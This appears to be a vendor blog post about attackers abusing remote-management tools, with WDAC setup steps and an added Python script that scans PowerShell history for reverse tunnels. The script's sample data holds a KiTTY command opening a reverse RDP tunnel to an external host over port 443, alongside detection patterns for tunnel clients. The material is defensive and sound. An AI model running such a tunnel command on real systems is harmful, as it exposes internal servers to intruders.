As remote work becomes the norm, IT departments worldwide face the challenge of managing devices spread across different cities and countries. To keep systems running smoothly, many organizations rely on VPNs and Remote Monitoring and Management (RMM) tools. While these tools offer convenience, they also present significant security risks, as cybercriminals can exploit them to gain unauthorised access to devices and data.
RMM software allows IT professionals to manage networks remotely, troubleshoot problems, install software, and transfer files to and from devices. This capability is essential for organizations with distributed workforces, as it simplifies many tasks that once required physical presence. However, the same features that make RMM tools invaluable to IT teams can be leveraged by malicious actors. If a connection isn’t secured properly, attackers can use these tools to access a victim’s device, execute commands, and extract data without detection.
Many cyber incidents investigated by Varonis last year revealed that ransomware-as-a-service (RaaS) groups have adopted a technique called “Living off the Land.” This method involves using legitimate IT tools, like RMM software, to control systems remotely, navigate networks undetected, and steal sensitive data. RMM tools enable attackers to blend in with normal network traffic, often bypassing security controls and organizational policies, such as application whitelisting. This tactic makes it easier for less experienced hackers, often referred to as “script kiddies,” to exploit networks using tools that are already installed and trusted by the system.
Our research has identified two primary methods that attackers use to exploit RMM tools. The first method involves abusing existing RMM tools. Attackers gain access to an organization’s network by exploiting vulnerabilities or weak credentials in preexisting RMM tools. This allows them to enter the network without raising alarms. The second method involves installing new RMM tools. Attackers may trick users into installing new RMM tools through phishing emails or social engineering tactics. Once installed, these tools provide the attackers with remote access to the network.
A recent investigation by Varonis’s Managed Data Detection and Response (MDDR) team found evidence of such exploitation. An organization discovered a compromised device with traces of an RMM tool called “KiTTY” in its PowerShell history. KiTTY, a modified version of the legitimate tool PuTTY, was used to create reverse tunnels over port 443, exposing internal servers to an AWS EC2 box. Since PuTTY is a trusted tool, the organization’s security software did not flag the activity as suspicious. The Varonis team’s analysis was crucial in tracing the attack chain, revealing how the breach occurred and what data was compromised. This investigation highlighted significant security gaps and emphasized the importance of addressing them to prevent future attacks.
Organisations can implement several strategies to reduce the risk of attackers exploiting RMM tools. One of the most effective measures is enforcing an application control policy, combined with basic hygiene around the RMM tools themselves: keep all RMM tools regularly updated and patched; limit access to authorized users with multi-factor authentication enabled; and block unnecessary connections by proactively blocking inbound and outbound traffic on forbidden RMM ports and protocols at the network perimeter. Whitelisting applications with Windows Defender Application Control (WDAC) policies allows only trusted applications to run, reducing the risk of unauthorised software execution. To create a WDAC policy, you can follow these steps using PowerShell:
Open PowerShell with administrative privileges. Create a new policy using the `New-CIPolicy` cmdlet to scan a directory or file and create a policy that permits all files within that path, such as executables and DLL files. For example:
```powershell
# -FilePath is the policy XML that will be written; -ScanPath is the directory whose
# executables and DLLs are scanned. Publisher rules are used where the files are signed,
# falling back to file hashes for unsigned binaries.
New-CIPolicy -FilePath "C:\Path\To\Policy.xml" -ScanPath "C:\Path\To\Application" -Level Publisher -Fallback Hash -UserPEs
```
Convert the policy to binary format using the `ConvertFrom-CIPolicy` cmdlet:
```powershell
ConvertFrom-CIPolicy -XmlFilePath "C:\Path\To\Policy.xml" -BinaryFilePath "C:\Path\To\Policy.bin"
```
Deploy the policy using the Group Policy Management Console (GPMC) by copying the `.bin` file to the `\\Windows\System32\CodeIntegrity` directory on target computers. Configure Group Policy to enforce the policy.
Continuous monitoring of network traffic and logs is essential, especially regarding RMM tools. Services like Varonis MDDR offer 24/7 network monitoring and behavioral analysis to identify suspicious activities promptly. Educating employees about cybersecurity risks is vital. Training should focus on recognising phishing attempts, managing passwords securely, and reporting suspicious activities. Regular testing can help identify vulnerabilities and improve the organization’s overall security posture.
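The KiTTY case above was found in PowerShell history, and the paragraph above calls for log monitoring. As an added example that is not part of the original article or any Varonis tooling, the script below scans an exported PowerShell ConsoleHost_history.txt for the pattern that case describes: a PuTTY-family client opening a reverse tunnel (-R) to an external host over a non-standard SSH port such as 443. The history lines, binary list and host address are constructed placeholders.

```python
import re
from dataclasses import dataclass

# Constructed sample of a ConsoleHost_history.txt export (not real incident data);
# 203.0.113.7 is a documentation address standing in for an external host.
SAMPLE_HISTORY = """\
Get-Process | Where-Object {$_.CPU -gt 100}
cd C:\\Users\\jdoe\\Downloads
.\\kitty.exe -ssh -P 443 -R 3389:10.0.0.5:3389 ec2-user@203.0.113.7
Get-ChildItem C:\\Shares\\Finance -Recurse | Measure-Object
putty.exe -load corp-jump
"""

# PuTTY-family clients named in the article plus plink; extend with the RMM tools you use.
TUNNEL_BINARIES = re.compile(r"(?i)\b(kitty|putty|plink)(?:\.exe)?\b")
REVERSE_FORWARD = re.compile(r"(?:^|\s)-R\s+\S+")      # PuTTY remote (reverse) port forward
SSH_PORT_FLAG = re.compile(r"(?:^|\s)-P\s+(\d+)")      # explicit SSH port

@dataclass
class Finding:
    line_no: int
    command: str
    reasons: list

def scan_history(text: str) -> list:
    """Return one Finding per history line that invokes a PuTTY-family client."""
    findings = []
    for n, line in enumerate(text.splitlines(), start=1):
        if not TUNNEL_BINARIES.search(line):
            continue
        reasons = ["ssh-client-binary"]
        if REVERSE_FORWARD.search(line):
            reasons.append("reverse-tunnel")
        port = SSH_PORT_FLAG.search(line)
        if port and port.group(1) != "22":
            reasons.append("ssh-on-port-" + port.group(1))
        findings.append(Finding(n, line, reasons))
    return findings

def high_confidence(findings: list) -> list:
    """Reverse tunnel plus a non-standard port; a bare saved session is likely admin use."""
    return [f for f in findings
            if "reverse-tunnel" in f.reasons
            and any(r.startswith("ssh-on-port-") for r in f.reasons)]

if __name__ == "__main__":
    for f in high_confidence(scan_history(SAMPLE_HISTORY)):
        print(f"line {f.line_no}: {', '.join(f.reasons)} :: {f.command}")
```

Feed it the per-user history file from a suspect host; any high-confidence hit is a reason to pull the matching network logs for that host and the destination address.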
As technology evolves, so do the tactics of both defenders and attackers. RMM tools are just one example of the potential threats organizations face. Varonis aims to protect what matters most: your data. Our all-in-one Data Security Platform continuously discovers and classifies critical data, mitigates exposures, and neutralises threats in real time with AI-powered automation. Curious about the potential risks lurking in your environment? Consider a Varonis Data Risk Assessment. Our free assessment is quick to set up and offers immediate insights. In less than 24 hours, you’ll receive a clear view of the data that matters most and actionable steps for remediation.
While RMM tools are essential for managing remote networks, they also pose significant security challenges. By understanding these risks and implementing robust security measures, organisations can better protect themselves from potential threats. Continuous monitoring, strict application control policies, and user education are critical components in safeguarding against RMM exploits.